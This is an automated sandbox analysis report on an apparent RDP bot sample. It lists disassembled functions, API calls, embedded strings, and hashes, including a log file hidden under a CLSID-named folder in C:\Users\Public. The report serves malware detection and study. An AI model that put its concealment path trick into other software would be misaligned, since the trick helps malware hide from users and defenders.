EnterCriticalSection.KERNEL32 ref: 00007FFE11BDC923
LeaveCriticalSection.KERNEL32 ref: 00007FFE11BDC94B
CopyFileA.KERNEL32 ref: 00007FFE11BDC9A8

Strings

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log, xrefs: 00007FFE11BDC96B
kernel32, xrefs: 00007FFE11BDC854, 00007FFE11BDC855
1, xrefs: 00007FFE11BDC992
., xrefs: 00007FFE11BDC98D

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$kernel32
API String ID: 513531256-1037688549
Opcode ID: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
Instruction ID: 40e32f94a878323150a508fca6637224d70ebf18701c300c918ee53080865090
Opcode Fuzzy Hash: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
Instruction Fuzzy Hash: 63418121A0CA82C6F7309F12E854BFA63A9FB847A4F402175DA4D87BB5DF2CE5818700

Function 00007FFE1A528480 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 70stringCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE1A52851E
strtol.MSVCRT ref: 00007FFE1A528534
_errno.MSVCRT ref: 00007FFE1A52853C
_errno.MSVCRT ref: 00007FFE1A528544

Strings

(value != NULL), xrefs: 00007FFE1A5284F6
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1A5284EF
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A528504
ini_get_uint16, xrefs: 00007FFE1A5284FD, 00007FFE1A528565
[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE1A52856C

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: _errno$strtol
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
API String ID: 3596500743-1991603811
Opcode ID: dbba0098bebe7831bce11c10c15f7774c0d09e815bf04c0a2830f14020b63573
Instruction ID: b9c45963e3c913e3f16c8e9a5c618c6cee8441d183ac5fb8a78debfd00261dbf
Opcode Fuzzy Hash: dbba0098bebe7831bce11c10c15f7774c0d09e815bf04c0a2830f14020b63573
Instruction Fuzzy Hash: 52219E22B0CE4682E7519B92A9407BA2361BF86BA8F4440B3EE4C07675DF3CE845C700

Function 00007FFE11BDD824 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE11BDD8C0
_strtoui64.MSVCRT ref: 00007FFE11BDD8D6
_errno.MSVCRT ref: 00007FFE11BDD8E0
_errno.MSVCRT ref: 00007FFE11BDD8EC

Strings

ini_get_uint64, xrefs: 00007FFE11BDD89F, 00007FFE11BDD90C
(value != NULL), xrefs: 00007FFE11BDD898
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE11BDD913
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11BDD8A6
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11BDD891

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: c2430e51137bdfcac8a7f993bd81b79aa4d505aa55653bf079d0e14eac936d9b
Instruction ID: d9702e1349206ccdf52ec6ada4ceba532e3b388916dabd49c788175f57c1d9b1
Opcode Fuzzy Hash: c2430e51137bdfcac8a7f993bd81b79aa4d505aa55653bf079d0e14eac936d9b
Instruction Fuzzy Hash: FF21BD21A08E42D5EB319F16E841BEA27A8BB447A8F441076EE8C476B0DF3DD885C700

Function 00007FFE1A4F2324 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE1A4F23C0
_strtoui64.MSVCRT ref: 00007FFE1A4F23D6
_errno.MSVCRT ref: 00007FFE1A4F23E0
_errno.MSVCRT ref: 00007FFE1A4F23EC

Strings

(value != NULL), xrefs: 00007FFE1A4F2398
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1A4F2391
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A4F23A6
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE1A4F2413
ini_get_uint64, xrefs: 00007FFE1A4F239F, 00007FFE1A4F240C

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: 89aa0e21db250a0a9dc53d02ceb4111de0ca1078fcb1226ea4dddc7f73a03173
Instruction ID: a2c78f7096fee2778d08a22b1b7714098b19633d47c18b4bf433ad4521e5341f
Opcode Fuzzy Hash: 89aa0e21db250a0a9dc53d02ceb4111de0ca1078fcb1226ea4dddc7f73a03173
Instruction Fuzzy Hash: B0216B62708E8396E6119F2AE9407FE2764EB46BA4F4440B3EE4C47674CF3CD945C700

Function 00007FFE126E1D84 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE126E1E20
_strtoui64.MSVCRT ref: 00007FFE126E1E36
_errno.MSVCRT ref: 00007FFE126E1E40
_errno.MSVCRT ref: 00007FFE126E1E4C

Strings

[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE126E1E73
(value != NULL), xrefs: 00007FFE126E1DF8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE126E1E06
ini_get_uint64, xrefs: 00007FFE126E1DFF, 00007FFE126E1E6C
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE126E1DF1

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: 94d0e78b07dbf61140f28006557bc8682f70656e71a87a5cbcffd379b83ea19f
Instruction ID: a9adae21544609bdd8c8d518acb7cc25291df43e8f34a781e56cb9caedf7ddca
Opcode Fuzzy Hash: 94d0e78b07dbf61140f28006557bc8682f70656e71a87a5cbcffd379b83ea19f
Instruction Fuzzy Hash: 89219C21A08E8295EB10DF16EC407EA2365BB447A8F4441B2EE4D077F8DFBCE945D704

Function 00007FFE1A528774 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE1A528810
_strtoui64.MSVCRT ref: 00007FFE1A528826
_errno.MSVCRT ref: 00007FFE1A528830
_errno.MSVCRT ref: 00007FFE1A52883C

Strings

(value != NULL), xrefs: 00007FFE1A5287E8
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE1A528863
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1A5287E1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A5287F6
ini_get_uint64, xrefs: 00007FFE1A5287EF, 00007FFE1A52885C

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: 3c86b423fce599834930ca3206a9adab9fd587731cb857f35fac76dd912f844b
Instruction ID: 8ead8a584d7bd00f1bd736b4518a475c1983c71f1a79d50192d8b22238169598
Opcode Fuzzy Hash: 3c86b423fce599834930ca3206a9adab9fd587731cb857f35fac76dd912f844b
Instruction Fuzzy Hash: A4218D22B0CE42C6E6528F96F8407BA2361BB86BA4F5440B7EE4D07664DF3DE845C700

Function 00007FFE115051C4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE11505260
_strtoui64.MSVCRT ref: 00007FFE11505276
_errno.MSVCRT ref: 00007FFE11505280
_errno.MSVCRT ref: 00007FFE1150528C

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11505246
(value != NULL), xrefs: 00007FFE11505238
ini_get_uint64, xrefs: 00007FFE1150523F, 00007FFE115052AC
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE115052B3
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11505231

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: 3a7ce3b9ecf46ad6e41ffd90ef29d7b1f69444f0e76e5fee42ec8905986ab387
Instruction ID: dec95aa38b2c74718abe27772fc588c8015df959b5d5ff0a66257b9335d796e3
Opcode Fuzzy Hash: 3a7ce3b9ecf46ad6e41ffd90ef29d7b1f69444f0e76e5fee42ec8905986ab387
Instruction Fuzzy Hash: A621DE22A18E4785E7619F96F8407AA336AFB447A8F484076EE4C47770CF7CD986C700

Function 00007FFE11ECAD94 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE11ECAE30
_strtoui64.MSVCRT ref: 00007FFE11ECAE46
_errno.MSVCRT ref: 00007FFE11ECAE50
_errno.MSVCRT ref: 00007FFE11ECAE5C

Strings

[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE11ECAE83
(value != NULL), xrefs: 00007FFE11ECAE08
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11ECAE01
ini_get_uint64, xrefs: 00007FFE11ECAE0F, 00007FFE11ECAE7C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11ECAE16

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: 9926e12a93399cbd0f51199e7bb221f18335d9af71f7cbefae87d4a12f157c56
Instruction ID: c70ca9367eeb85c6f09891d1d29e4eebca2705f67a715df781787005d2469805
Opcode Fuzzy Hash: 9926e12a93399cbd0f51199e7bb221f18335d9af71f7cbefae87d4a12f157c56
Instruction Fuzzy Hash: E0217E22A08E8386E7119F96EC407EB6768BB847A8F845072EE4D47670EF3CE845C700

Function 00007FFE11BDD300 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE11BDD3EC

Strings

ini_get_var, xrefs: 00007FFE11BDD349, 00007FFE11BDD37C, 00007FFE11BDD3AF, 00007FFE11BDD416, 00007FFE11BDD45E
NULL, xrefs: 00007FFE11BDD47E, 00007FFE11BDD487
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE11BDD41D
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE11BDD465
(var != NULL), xrefs: 00007FFE11BDD3A8
(name != NULL), xrefs: 00007FFE11BDD375
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11BDD350, 00007FFE11BDD383, 00007FFE11BDD3B6
(sec != NULL), xrefs: 00007FFE11BDD342
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11BDD33B, 00007FFE11BDD36E, 00007FFE11BDD3A1

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: bfa3c9006445efba63ba8326c9e85cb3af0e39facda1b26ce66b92f8449dc0da
Instruction ID: 1dfe41b592edacf9bdaaac4e61243ead77e0a76fbc697503833281367f93d74a
Opcode Fuzzy Hash: bfa3c9006445efba63ba8326c9e85cb3af0e39facda1b26ce66b92f8449dc0da
Instruction Fuzzy Hash: 74412AA1A0DE47D1FF388F56A840BF96368AF00378F4461B6EA9D065B4DF7CA945C340

Function 00007FFE126E1860 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE126E194C

Strings

[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE126E19C5
(name != NULL), xrefs: 00007FFE126E18D5
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE126E197D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE126E18B0, 00007FFE126E18E3, 00007FFE126E1916
NULL, xrefs: 00007FFE126E19DE, 00007FFE126E19E7
(sec != NULL), xrefs: 00007FFE126E18A2
(var != NULL), xrefs: 00007FFE126E1908
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE126E189B, 00007FFE126E18CE, 00007FFE126E1901
ini_get_var, xrefs: 00007FFE126E18A9, 00007FFE126E18DC, 00007FFE126E190F, 00007FFE126E1976, 00007FFE126E19BE

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: aafbfb6d1cad4e1dac59c53ae980061822dba5a3be8acbd62d8547b9bc58a3d9
Instruction ID: ac229b04b9db741d938e4d60755e9cc6501d3d8404e2a62530a4b97c8e8e64e1
Opcode Fuzzy Hash: aafbfb6d1cad4e1dac59c53ae980061822dba5a3be8acbd62d8547b9bc58a3d9
Instruction Fuzzy Hash: F0414861A08E87D5FB50CB53EC107F52261BB24368F4441B2DA5D065F9DFFCAA49D308

Function 00007FFE1A528250 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE1A52833C

Strings

(var != NULL), xrefs: 00007FFE1A5282F8
ini_get_var, xrefs: 00007FFE1A528299, 00007FFE1A5282CC, 00007FFE1A5282FF, 00007FFE1A528366, 00007FFE1A5283AE
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1A52828B, 00007FFE1A5282BE, 00007FFE1A5282F1
(name != NULL), xrefs: 00007FFE1A5282C5
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE1A52836D
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE1A5283B5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A5282A0, 00007FFE1A5282D3, 00007FFE1A528306
(sec != NULL), xrefs: 00007FFE1A528292
NULL, xrefs: 00007FFE1A5283CE, 00007FFE1A5283D7

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: e858cae3dc97d11c6470ca111c3d7212b8439e8bace66bc7af2e7ae73a402f84
Instruction ID: 26f1674117f3628952fe2bc022a41f3f498e6bf3ad5a1372327fcefe48d6297b
Opcode Fuzzy Hash: e858cae3dc97d11c6470ca111c3d7212b8439e8bace66bc7af2e7ae73a402f84
Instruction Fuzzy Hash: 8F410C62F0CE47D5FA21CB92A9503F82261BFA6B68F5841F3E94C461B1DF3CA545C300

Function 00007FFE11504CA0 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE11504D8C

Strings

NULL, xrefs: 00007FFE11504E1E, 00007FFE11504E27
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11504CF0, 00007FFE11504D23, 00007FFE11504D56
(name != NULL), xrefs: 00007FFE11504D15
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE11504E05
(var != NULL), xrefs: 00007FFE11504D48
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11504CDB, 00007FFE11504D0E, 00007FFE11504D41
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE11504DBD
ini_get_var, xrefs: 00007FFE11504CE9, 00007FFE11504D1C, 00007FFE11504D4F, 00007FFE11504DB6, 00007FFE11504DFE
(sec != NULL), xrefs: 00007FFE11504CE2

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: 294f8e8ff5cc726cee35a654d782d5a40a71da78ca2345d8e6786d0abf33f29c
Instruction ID: 0dba368a63209de25907f1ee489db7c10b3260e148d46bb2c1ff5bc3426d20ee
Opcode Fuzzy Hash: 294f8e8ff5cc726cee35a654d782d5a40a71da78ca2345d8e6786d0abf33f29c
Instruction Fuzzy Hash: C9417F62A18E4795FB118B92E8403F86759BF0136CF8841BADA4D461B4DF7CEA56C300

Function 00007FFE11BDD179 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE11BDD26D

Strings

NULL, xrefs: 00007FFE11BDD2E4
ini_get_sec, xrefs: 00007FFE11BDD1C2, 00007FFE11BDD1F5, 00007FFE11BDD228, 00007FFE11BDD286, 00007FFE11BDD2C4
(ini != NULL), xrefs: 00007FFE11BDD1BB
(name != NULL), xrefs: 00007FFE11BDD1EE
[D] (%s) -> Done(name=%s), xrefs: 00007FFE11BDD28D
